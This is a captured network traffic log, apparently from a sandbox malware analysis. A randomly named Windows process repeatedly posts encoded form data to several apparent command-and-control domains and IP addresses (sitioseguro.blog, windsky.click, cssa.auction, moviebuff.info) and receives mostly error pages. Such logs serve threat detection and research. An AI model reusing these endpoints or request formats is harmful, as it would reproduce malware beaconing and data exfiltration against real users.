                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:23:05.068605900 CET | 694 | OUT | POST /s7xt/ HTTP/1.1
                                                                            Host: www.sitioseguro.blog
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.sitioseguro.blog
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.sitioseguro.blog/s7xt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=HKwmnw8C74mvA+p9z1iCY1V1UgdybW9maJmexcRt5A2bu5bvDTjBuP0o5j00DljqSmWNux5dAeu4nWPLuH7RyVJJkKCl5rNLyStxlsDILiDX/7i4oo+b1YR8zsOoJWnm5XGVqji2xGGhy5vUi1JX9u6tfAT3rU4VO8PGEawhJ3qPlf4bgEfSsuDZirsQ
                                                                            Nov 24, 2024 08:23:06.307883978 CET | 925 | IN | HTTP/1.1 405 Not Allowed
                                                                            Date: Sun, 24 Nov 2024 07:23:06 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzWBnlZsnV%2B8Xu1MNUkFG1bvA7yyS0kw%2FhUseMDoSdDZvbZ9ujK3SnJbQMG2bJ96SOpcV2NIhKomYYgZQcGKBnbx9JTrWKoQqPAe8Ob4%2BJdJK1hvRcH9yKL1RAEcoZmQ1LlT1%2FmLug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a6d2ec350fa9-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1458&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=694&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            18 | 192.168.2.10 | 49981 | 172.67.162.39 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:23:07.740407944 CET | 718 | OUT | POST /s7xt/ HTTP/1.1
                                                                            Host: www.sitioseguro.blog
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.sitioseguro.blog
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.sitioseguro.blog/s7xt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=HKwmnw8C74mvAfZ91UiCdVV2IwdyR296aJ6exdEw5ySbuYrvCRHBvP0ohT18e1jjSmavuwFdAeK4nTLLuUTQ0FJH86Cn3LNLyStxlsXyLi7X/Oy4yJ+cpoR/0sOoDGnq5XGzqmCcxEOhy4fUikJUzu6rcwSOrBIfAZvZMJUoXn2Lm+FcxV+F/ZfXstZ6KGyuerZKL7OXto4TmcLImg==
                                                                            Nov 24, 2024 08:23:08.932344913 CET | 937 | IN | HTTP/1.1 405 Not Allowed
                                                                            Date: Sun, 24 Nov 2024 07:23:08 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ba6ajoZpDtKCb0qZ%2FewlL%2Fyh%2Bt08%2BNMhuf6%2Fp3SNIZC0zxG%2BI6%2Fgwg8H37f4ffrlL59mDCakUai5rvM6nCiJMG4auGHqmbiX6PeZ9CN%2F9ZeYWjTqeeoKD%2BZdAtHwdx%2Fk49vd6OFfkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a6e34a100f55-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1515&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            19 | 192.168.2.10 | 49988 | 172.67.162.39 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:23:10.411919117 CET | 1731 | OUT | POST /s7xt/ HTTP/1.1
                                                                            Host: www.sitioseguro.blog
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.sitioseguro.blog
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.sitioseguro.blog/s7xt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:23:11.654504061 CET | 926 | IN | HTTP/1.1 405 Not Allowed
                                                                            Date: Sun, 24 Nov 2024 07:23:11 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GIMh6sffulJLZ4tycV5e9d%2FhLXv%2BRyRwHn1hoD3u46tdGL%2Bx9C0OxxYGgK7qcMgb1HjAqf2ebPadbIyT0mIxaNnTlEaM1uvYoJClfwLVq8S2Omjv9AQXboqTL4Lbs3SbVasZU65k%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a6f4487d42f1-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1565&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1731&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            20 | 192.168.2.10 | 49993 | 172.67.162.39 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:23:13.077807903 CET | 426 | OUT | GET /s7xt/?GX6Lp2F=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA9U5k7peL8+9qmxBtq+TRLy+e1vGRqg==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.sitioseguro.blog
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:23:14.280555010 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            Date: Sun, 24 Nov 2024 07:23:14 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                                                            Accept-Ranges: bytes
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1gKy9Di0chRBpBtHVVXs7THJZWUdaygMMv8JXglRNzN4Jte%2FihhSanlL1HGtNV5ga48T661xsjmg%2BGNrkpGBaSTEoSL8j0xv2OZFMnOW%2BocLqXNqTUrmIJtido4QXQNM4ijD7TpBEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a704ce81efa7-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=77&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.mai


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            21 | 192.168.2.10 | 50002 | 46.253.5.221 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:23:19.835752010 CET | 685 | OUT | POST /gybb/ HTTP/1.1
                                                                            Host: www.windsky.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.windsky.click
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.windsky.click/gybb/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=sCcUsF5VlWhXMY1Xml8W110ikG9iYt+lSMt6C3t9tFfJUzmzARL0Hx4HL+OiZCvPqiR0sX5z8JsKJIHU2Xsd1fkCXndUqIaSo7XekyVYfmr8U2tkJ3NPJxwC7KaJQTj/yrRVO3D6OdZaAXM3/saFLh8EHTkrBcLGDCvLRK3U6ZSJtYjfRkNoNiIuAc/7


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            22 | 192.168.2.10 | 50003 | 46.253.5.221 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:23:22.504612923 CET | 709 | OUT | POST /gybb/ HTTP/1.1
                                                                            Host: www.windsky.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.windsky.click
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.windsky.click/gybb/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=sCcUsF5VlWhXN8JXgGUW0V0lnG9iSN+pSMp6CyNtu2rJRmCzBST0LR4HTuOnXivUqidCsW1z8J4KJI3U1mse6vkMbHdW3YaSo7Xek29mfmz8UD9kKWNIWBwd8KaJGjjzyrR3OyrAOfRaASw3xdaECh8CKzlpF/6rPD/xWoqYvpSTq5eYA1s/eVUgOaKRaghLownmqeStG8Cno4QgLA==


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            23 | 192.168.2.10 | 50004 | 46.253.5.221 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:23:25.180537939 CET | 1722 | OUT | POST /gybb/ HTTP/1.1
                                                                            Host: www.windsky.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.windsky.click
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.windsky.click/gybb/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            24 | 192.168.2.10 | 50005 | 46.253.5.221 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:23:27.841658115 CET | 423 | OUT | GET /gybb/?H8=BpFD-28hKhrD&GX6Lp2F=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4PgAZipsqs/kn6LZvixDWxXnWnZkIg== HTTP/1.1
                                                                            Host: www.windsky.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            25 | 192.168.2.10 | 50006 | 107.167.84.42 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:23:55.380878925 CET | 682 | OUT | POST /rjvg/ HTTP/1.1
                                                                            Host: www.cssa.auction
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.cssa.auction
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.cssa.auction/rjvg/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=gWg0hdzfwUNWE61gHD53dItJHNaEC7vl5txMnh1ytN9VBuhTl9GzUCY3NXo3+96hOQ8n2qXv1h0l0rAxV04JCDaJo1l/3SqXIHfpwdE+T/OtxbtSz4q3glQ2jnrM8dOrX2wC7K9JJctXrhG9HO5f5ZCglJbEQi9DTBHl9ZbqBhH8OpVdqEjhIGJ6qaZP
                                                                            Nov 24, 2024 08:23:56.661752939 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Sun, 24 Nov 2024 07:23:56 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            26 | 192.168.2.10 | 50007 | 107.167.84.42 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:23:58.050436974 CET | 706 | OUT | POST /rjvg/ HTTP/1.1
                                                                            Host: www.cssa.auction
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.cssa.auction
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.cssa.auction/rjvg/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=gWg0hdzfwUNWFbFgUwh3aotObdaEbruu5t9Mngxis/ZVGMpT3PuzXCY3F3oy696mOQxS2v3v1gQl0uExVHQKDTaLnVl94yqXIHfpwckQT/Wt2vpSxZq4mVQ5z3rM4dOVX2w87IJvJfVXrki9HatcwZCiqpa9RCgULirt97bSAXHeNIoa7VC2bxV0kcslp87Jbk4Sy1n6EK5wfMzqdg==
                                                                            Nov 24, 2024 08:23:59.292924881 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Sun, 24 Nov 2024 07:23:59 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                            Nov 24, 2024 08:23:59.292967081 CET  253  IN
                                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                            27  192.168.2.10  50008  107.167.84.42  80  4764  C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 24, 2024 08:24:00.710191965 CET  1719  OUT  POST /rjvg/ HTTP/1.1
                                                                            Host: www.cssa.auction
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.cssa.auction
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.cssa.auction/rjvg/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:24:01.939541101 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Sun, 24 Nov 2024 07:24:01 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                            Nov 24, 2024 08:24:01.939558983 CET  253  IN
                                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                            28  192.168.2.10  50009  107.167.84.42  80  4764  C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 24, 2024 08:24:03.379560947 CET  422  OUT  GET /rjvg/?GX6Lp2F=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MhCYnHJ28VWxL0fj0Y8TMYCyxad2qg==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.cssa.auction
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:24:04.614799023 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Sun, 24 Nov 2024 07:24:04 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                            Nov 24, 2024 08:24:04.614813089 CET  253  IN
                                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                            29  192.168.2.10  50010  209.74.77.109  80  4764  C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 24, 2024 08:24:10.379699945 CET  688  OUT  POST /4r26/ HTTP/1.1
                                                                            Host: www.moviebuff.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.moviebuff.info
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.moviebuff.info/4r26/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=3PGUoE7TzLvmU5ArY/GSB4suTAff+DdgAyY8aDJYBduWt0SsZiobaOFiBa5tfrKAB2m04Fra9NqcqjCU2JlpSaEkEQWWVBDaA/JBl0Pl6IS9VutfhBUqHCJ2wWN+LJrrgO1eo6jlPTt+BpU1Y3fc32PyR6beQoM262YEaK3/BzIqi6tlAe6nROKRdmIg
                                                                            Nov 24, 2024 08:24:11.589339018 CET  533  IN  HTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:24:11 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                            30  192.168.2.10  50011  209.74.77.109  80  4764  C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 24, 2024 08:24:13.058130026 CET  712  OUT  POST /4r26/ HTTP/1.1
                                                                            Host: www.moviebuff.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.moviebuff.info
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.moviebuff.info/4r26/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
